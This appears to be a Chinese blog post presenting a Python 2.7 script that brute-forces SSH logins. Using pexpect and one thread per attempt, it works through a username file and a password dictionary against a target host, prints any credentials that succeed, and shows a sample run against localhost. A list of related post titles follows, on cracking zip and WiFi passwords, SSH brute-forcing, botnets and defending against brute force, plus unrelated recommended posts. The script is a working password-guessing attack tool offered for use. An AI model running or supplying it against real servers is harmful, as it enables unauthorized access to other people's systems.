# -*- coding:utf-8 -*-

 #python 2.7

 import optparse,sys,threading

 import pexpect

 PROMPT = ['#','>','/$']

 def ssh(host,user,password):

     child = pexpect.spawn('ssh %s@%s' % (user,host))

     ret = child.expect(['(?i)are you sure.*','(?i)password:',pexpect.TIMEOUT,pexpect.EOF])

     #print child.before

     if ret == 0:

         child.sendline('yes')

         child.expect('[pP]ssword:')

         child.sendline(password)

         try:

             ret0 = child.expect(PROMPT)

             if ret0 in (0,1,2):

                 #print child.before

                 print '[+] 已经连接0'

                 print '<*>用户是:' + user

                 print '<*>密码是:' + password

                 #return child

         except:

             print '[-]连接失败0,密码错误!'

     elif ret == 1:

         child.sendline(password)

         try:

             ret1 = child.expect(PROMPT)

             print child.before

             if ret1 in (0,1,2):

                 #print child.before

                 print '[+] 已经连接1'

                 print '<*>用户是:' + user

                 print '<*>密码是:' + password

                 #return child

         except:

             print '[-]连接失败1,用户或密码错误!'

     else:

         print '[-] 连接失败2'

 def main():

     usage = 'Usage:%prog <-H host> <-U user.txt> <-D dictionary.txt>'

     parser = optparse.OptionParser(usage,version='%prog v1.0')

     parser.add_option('-H',dest='target_host',type='string',

                       help='目标主机')

     parser.add_option('-U',dest='user',type='string',

                       help='ssh用户')

     parser.add_option('-D',dest='dictionary',type='string',

                       help='密码字典')

     (options,args) = parser.parse_args()

     if  (not options.target_host) | (not options.user) | (not options.dictionary):

         print parser.usage

         exit(0)

     else:

         target_host = options.target_host

         users = options.user

         passwords = options.dictionary

     users = open(users)

     passwords = open(passwords)

     #i = 0

     for user in users:

         user = user.strip('\r\n')

         #print user + str(i)

         #i = i + 1

         passwords.seek(0)#回到密码文件行首

         for password in passwords:

             password = password.strip('\r\n')

             #print user

             t = threading.Thread(target=ssh,args=(target_host,user,password))

             t.start()

 if __name__ == '__main__':

     main()

测试运行结果为:

python Sshconector.py  -H 127.0.0.1 -U user.txt -D password.txt

Linux HOSTKALI 3.18.0-kali1-amd64

[+] 已经连接1

<*>用户是:root

<*>密码是:xxxxxxx

[-]连接失败1,用户或密码错误!

[-]连接失败1,用户或密码错误!

[-]连接失败1,用户或密码错误!

[-]连接失败1,用户或密码错误!

[-]连接失败1,用户或密码错误!

[-]连接失败1,用户或密码错误!

[-]连接失败1,用户或密码错误!

[-]连接失败1,用户或密码错误!

[-]连接失败1,用户或密码错误!

[-]连接失败1,用户或密码错误!

[-]连接失败1,用户或密码错误!

利用python暴力破解ssh的更多相关文章

  1. 利用python暴力破解压缩文件密码

    import randomimport sysimport zipfileimport timefrom threading import Threadfrom multiprocessing imp ...

  2. Python脚本暴力破解SSH口令以及构建僵尸网络(pxssh)

    目录 暴力破解SSH口令 SSH远端执行命令 构建僵尸网络 环境:Kali Linux  python 2.7.13 暴力破解SSH口令 Pxssh是pexpect库的ssh专用脚本,他能用预先写好的 ...

  3. centos 7 DenyHosts 安装 防暴力破解ssh登陆

    为了减少软件扫描ssh登陆 还是用这个比较好点  默认端口号22 也要改 登陆密码也不要使用 弱口令 123456 这样的 Description DenyHosts is a python prog ...

  4. python 暴力破解密码脚本

    python 暴力破解密码脚本 以下,仅为个人测试代码,环境也是测试环境,暴力破解原理都是一样的, 假设要暴力破解登陆网站www.a.com 用户 testUser的密码, 首先,该网站登陆的验证要支 ...

  5. 10小时之内,暴力破解SSH账号的IP

    10小时之内,暴力破解SSH账号的IP,IP 地址数据来源于  ip138.com 182.18.76.246 北京市昌平区 北京亿安天下网络科技有限公司 联通 221.223.200.143 北京市 ...

  6. 分享一个撩妹、装13神技能,0基础用Python暴力破解WiFi密码

    WiFi密码Python暴力破解   Python密码破解部分截图 获取视频资料,转发此文+点击喜欢,然后获取资料请加Python交流群:580478401,就可以获取视频教程+源码 环境准备: py ...

  7. 使用Medusa美杜莎暴力破解SSH密码

    使用Medusa美杜莎暴力破解SSH密码 1.Medusa简介 Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具.可以同时对多个主机,用户或密码执行强力测试.Medusa和hy ...

  8. Linux 利用hosts.deny 防止暴力破解ssh

    一.ssh暴力破解 利用专业的破解程序,配合密码字典.登陆用户名,尝试登陆服务器,来进行破解密码,此方法,虽慢,但却很有效果. 二.暴力破解演示 2.1.基础环境:2台linux主机(centos 7 ...

  9. Linux 利用hosts.deny 防止暴力破解ssh(转)

    一.ssh暴力破解 利用专业的破解程序,配合密码字典.登陆用户名,尝试登陆服务器,来进行破解密码,此方法,虽慢,但却很有效果. 二.暴力破解演示 2.1.基础环境:2台linux主机(centos 7 ...

随机推荐

  1. linux 使用mail 发送邮件

    配置: /etc/mail.rc 追加配置参数 set from=lynctest@iclinux.com smtp="mail.iclinux.com"smtp-auth-use ...

  2. mysql无法创建外键问题

    在阿里云上面安装配置了Mysql后,无法创建外键, 原因及解决方法: 选择InnoDB引擎,因为MyISAM引擎不支持外键,默默地说一句,MySQL真神奇

  3. BZOJ 2154 Crash的数字表格 ——莫比乌斯反演

    求$\sum_{i=1}^n\sum_{j=1}^n lcm(i,j)$ 枚举因数 $ans=\sum_{d<=n} F(d) * d$ $F(d)$表示给定范围内两两$\sum_{gcd(i, ...

  4. BZOJ 3733 [Pa2013]Iloczyn 模拟爆搜

    Description 给定正整数n和k,问能否将n分解为k个不同正整数的乘积 Input 第一行一个数T(T<=4000)表示测试组数 接下来T行每行两个数n(n<=10^9),k(k& ...

  5. Mysql字符集与校对规则

    字符集是一套字符和编码的集合,校对规则是用于比较字符集的一套规则. 所以字符集有两部分组成字符集合和对应的编码集合.比如说,现在有这几个字符:A B a b, 假设它们对应的编码分别是00, 01, ...

  6. HDU 4770 Lights Against Dudely 暴力枚举+dfs

    又一发吐血ac,,,再次明白了用函数(代码重用)和思路清晰的重要性. 11779687 2014-10-02 20:57:53 Accepted 4770 0MS 496K 2976 B G++ cz ...

  7. Scrapy学习-4-Items类&Pipelines类

    items类使用 作用 能使得我们非常方便的操作字段名 在items.py中定制我们的类 class ArticleItem(scrapy.Item): title = scrapy.Field() ...

  8. ThinkPHP5.1入门

    ThinkPHP5.1入门 ===================================Composer的官方网站:https://www.phpcomposer.com/========= ...

  9. 多线程之 Volatile 变量 详解

    Java 理论与实践: 正确使用 Volatile 变量 原文:http://www.ibm.com/developerworks/cn/java/j-jtp06197.html 总结: volati ...

  10. windows symbol server调试

    linux下gdb强大的调试功能让人印象深刻,一直以为windows下调试可执行程序非常让人头痛.经一些高人指点后知道原来windows下还有symbol server这种调试工具 参见下面两个文档 ...